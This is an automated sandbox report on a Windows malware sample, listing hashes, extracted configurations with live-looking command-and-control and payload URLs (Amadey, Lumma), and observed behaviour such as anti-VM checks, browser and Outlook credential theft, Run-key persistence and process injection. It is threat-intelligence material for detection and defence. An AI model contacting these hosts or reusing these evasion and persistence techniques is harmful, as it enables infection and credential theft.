Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 14:47
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
5a330d82f7fb0451f97614b063c754cb
-
SHA1
f81620609e53bcaeed1c636f9a7552474a0d18b9
-
SHA256
7c91a1dcb3bdc0ff94a9f4dce61cf5db01eed3b6c7971dfa0f9ad0fc668efbdd
-
SHA512
ca5615a9e6c1a34b246b0f6e397d01d3298e4798bbaa8baf7dc4f29a951ec7c2a5140100afd0912538356f851edcffdff11b5169f4664ff448965d6515a5e89a
-
SSDEEP
24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8a0Mu:KTvC/MTQYxsWR7a0M
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://2travelilx.top/GSKAiz
https://jrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://-furthert.run/azpp
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://easyfwdr.digital/azxs
https://jjrxsafer.top/shpaoz
https://upuerrogfh.live/iqwez
https://furthert.run/azpp
https://reformzv.digital/guud
https://apuerrogfh.live/iqwez
https://vquavabvc.top/iuzhd
https://advennture.top/GKsiio
https://0targett.top/dsANGt
https://uywmedici.top/noagis
https://nadvennture.top/GKsiio
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/4536-63-0x0000000000400000-0x000000000073C000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c814807ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 14 2904 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6868 powershell.exe 2904 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 281 4472 MSBuild.exe 179 5392 rapes.exe 14 2904 powershell.exe 247 4472 MSBuild.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 32 5392 rapes.exe 236 4472 MSBuild.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6760 chrome.exe 6752 chrome.exe 6824 chrome.exe 7120 chrome.exe 4036 msedge.exe 1940 msedge.exe 4452 msedge.exe 1468 msedge.exe 4568 msedge.exe 6440 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c814807ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c814807ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 352038b977.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 352038b977.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 21 IoCs
pid Process 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 5392 rapes.exe 3916 v1BRaoR.exe 3860 Nehh6wZ.exe 3004 31W3sid.exe 816 NlmvJyQ.exe 4460 efd0386a9c.exe 2704 5c814807ae.exe 5656 352038b977.exe 5528 efe6bfcae2.exe 736 rapes.exe 5776 367de4acd7.exe 632 f078cfe6f7.exe 396 31W3sid.exe 5776 DgQBvwg.exe 2168 exp.exe 4784 larBxd7.exe 4452 9sWdA2p.exe 3596 rapes.exe 5704 Rm3cVPI.exe 4004 v1BRaoR.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 5c814807ae.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\efe6bfcae2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494500101\\efe6bfcae2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" DgQBvwg.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c814807ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494480101\\5c814807ae.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\352038b977.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494490101\\352038b977.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00060000000227c8-167.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 5392 rapes.exe 2704 5c814807ae.exe 736 rapes.exe 3596 rapes.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 3916 set thread context of 4536 3916 v1BRaoR.exe 105 PID 3860 set thread context of 860 3860 Nehh6wZ.exe 110 PID 3004 set thread context of 1248 3004 31W3sid.exe 112 PID 816 set thread context of 1564 816 NlmvJyQ.exe 114 PID 4460 set thread context of 5500 4460 efd0386a9c.exe 117 PID 396 set thread context of 2096 396 31W3sid.exe 159 PID 5776 set thread context of 4472 5776 DgQBvwg.exe 165 PID 2168 set thread context of 3860 2168 exp.exe 176 PID 4472 set thread context of 3756 4472 MSBuild.exe 178 PID 4472 set thread context of 3860 4472 MSBuild.exe 181 PID 4004 set thread context of 5352 4004 v1BRaoR.exe 184 PID 4472 set thread context of 2804 4472 MSBuild.exe 185 PID 4472 set thread context of 6980 4472 MSBuild.exe 209 PID 4472 set thread context of 2168 4472 MSBuild.exe 211 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe MSBuild.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI217D.tmp msiexec.exe File created C:\Windows\Installer\e581fcc.msi msiexec.exe File created C:\Windows\Tasks\rapes.job Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE File opened for modification C:\Windows\Installer\e581fc8.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{90C11C8A-AD21-4E7E-BDFA-BD9C724A6087} msiexec.exe File created C:\Windows\Installer\e581fc8.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1984 4536 WerFault.exe 105 1748 5500 WerFault.exe 117 6292 5352 WerFault.exe 184 -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c814807ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language efe6bfcae2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efe6bfcae2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 367de4acd7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage efe6bfcae2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe -
Checks processor information in registry 2 TTPs 38 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information MSBuild.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3964 taskkill.exe 3916 taskkill.exe 5964 taskkill.exe 3368 taskkill.exe 1496 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe -
Modifies registry class 28 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\PackageCode = "CEFEBEF251D3D34458A6CE4F5E1D0E42" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494510271\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\PackageName = "33e3372c0a.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678\DefaultFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\ProductName = "BatchInstallerFinal" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AuthorizedLUAApp = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\10494510271\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4928 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4472 MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2904 powershell.exe 2904 powershell.exe 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 5392 rapes.exe 5392 rapes.exe 860 MSBuild.exe 860 MSBuild.exe 860 MSBuild.exe 860 MSBuild.exe 1564 MSBuild.exe 1564 MSBuild.exe 1564 MSBuild.exe 1564 MSBuild.exe 5500 MSBuild.exe 5500 MSBuild.exe 5500 MSBuild.exe 5500 MSBuild.exe 2704 5c814807ae.exe 2704 5c814807ae.exe 2704 5c814807ae.exe 2704 5c814807ae.exe 2704 5c814807ae.exe 2704 5c814807ae.exe 736 rapes.exe 736 rapes.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 1372 msiexec.exe 1372 msiexec.exe 1372 msiexec.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 2168 exp.exe 2168 exp.exe 2168 exp.exe 2168 exp.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4784 larBxd7.exe 4784 larBxd7.exe 4784 larBxd7.exe 4784 larBxd7.exe 4784 larBxd7.exe 4784 larBxd7.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe 4472 MSBuild.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 6440 chrome.exe 6440 chrome.exe 6440 chrome.exe 6440 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
